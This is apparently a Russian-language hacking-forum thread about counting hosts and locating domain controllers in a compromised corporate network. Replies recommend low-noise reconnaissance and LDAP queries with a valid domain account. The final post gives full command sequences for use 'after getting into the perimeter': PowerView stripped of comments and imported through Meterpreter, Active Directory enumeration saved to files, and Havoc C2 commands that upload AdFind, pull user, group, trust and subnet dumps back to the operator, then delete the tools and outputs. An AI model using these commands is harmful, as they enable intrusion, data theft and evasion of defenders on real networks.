Как сканить сеть на количество ПК. В FortiNet, Cisco, BigIP

[Zer0Trace]

Всем доброго времени суток!

Нужна помощь по парочке вопросов:
1. Как сканить сеть, чтобы посчитать количество ПК
2. Какие способы для нахождения DC в сети вы используете?
Если у кого-то есть мануал — буду очень признателен за помощь.

 

[qazwsx123]

лично я для подсчета не использую скан. просто делаю get-adcomputer и фильтрую результат по дате последнего входа (1-6 месяцев, зависит от сети).

посмотри конфиг впн, какой днс установлен. во-первых он может совпадать с dc. во вторых ты можешь и без скана через этот днс запрашивать имена хостов по IP (часто хостнейм dc имеет вид adc.xxx.local, dc1.xxx.local, dc01.xxx.local - сразу поймешь). это будет и быстрее и менее палевно, чем полный скан. ну а так, если просто сканить, на dc должны висеть сервисы kerberos, ldap и их будет видно по открытым портам.

 

[Zer0Trace]

лично я для подсчета не использую скан. просто делаю get-adcomputer и фильтрую результат по дате последнего входа (1-6 месяцев, зависит от сети).

посмотри конфиг впн, какой днс установлен. во-первых он может совпадать с dc. во вторых ты можешь и без скана через этот днс запрашивать имена хостов по IP (часто хостнейм dc имеет вид adc.xxx.local, dc1.xxx.local, dc01.xxx.local - сразу поймешь). это будет и быстрее и менее палевно, чем полный скан. ну а так, если просто сканить, на dc должны висеть сервисы kerberos, ldap и их будет видно по открытым портам.

Приветствую, спасибо за ответ)
Про первые два способа не слышал (если ты говоришь про ВПН) я когда сканирую диапазон нахожу DC в этом нет проблемы, но весь вопрос в том как узнать количество пк в сети ( Active Directory )
Если подскажешь буду отчень благодарен!

 

[disableurmind]

Приветствую, спасибо за ответ)
Про первые два способа не слышал (если ты говоришь про ВПН) я когда сканирую диапазон нахожу DC в этом нет проблемы, но весь вопрос в том как узнать количество пк в сети ( Active Directory )
Если подскажешь буду отчень благодарен!

Количество ПК в сети можно узнать, только отсканировав сеть, и желательно изнутри сети, а не из VPN'a. Но если вопрос стоит не о включенных компьютерах, а в целом о машин аккаунтах, то можно сделать запрос с помощью ldapsearch, единственное условие, что бы была валид доменная учетная запись.

 

[Zer0Trace]

ldapsearch

Спасибо, поробую воспользоваться

 

[apdcx0]

После того как залетел в периметр.
Meta:
sed -i -e '/<#/,/#>/c\\' PowerView.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' PowerView.ps1
powershell_import /opt/tools/PowerView.ps1 --> Импортируем
Get-DomainComputer -operatingsystem "*server*" -Properties name,operatingsystem,lastlogon,logoncount | Sort-Object -Property operatingsystem | Select-Object -Property name,operatingsystem,lastlogon,logoncount | Format-Table -Wrap -AutoSize | Out-File -FilePath C:\ProgramData\ad_servers.txt -append -force -encoding UTF8 --> powershell_shell сессии
Get-DomainComputer -Properties name,operatingsystem,lastlogon,logoncount | Where-Object operatingsystem -notlike "*server*" | Sort-Object -Property operatingsystem | Select-Object -Property name,operatingsystem,lastlogon,logoncount | Format-Table -Wrap -AutoSize | Out-File -FilePath C:\ProgramData\ad_computers.txt -append -force -encoding UTF8 --> powershell_shell сессии

Havoc:
nps Get-ADComputer -Properties Name,operatingSystem -Filter *
nps Get-ADComputer -Properties Name -Filter *
upload /opt/tools/AdFind.exe
upload /opt/tools/adf.bat
shell adf.bat
download ad_users.txt
download ad_computers.txt
download ad_group.txt
download ad_ous.txt
download trustdmp.txt
download subnets.txt
remove AdFind.exe
remove adf.bat
remove ad_users.txt
remove ad_computers.txt
remove ad_group.txt
remove ad_ous.txt
remove trustdmp.txt
remove subnets.txt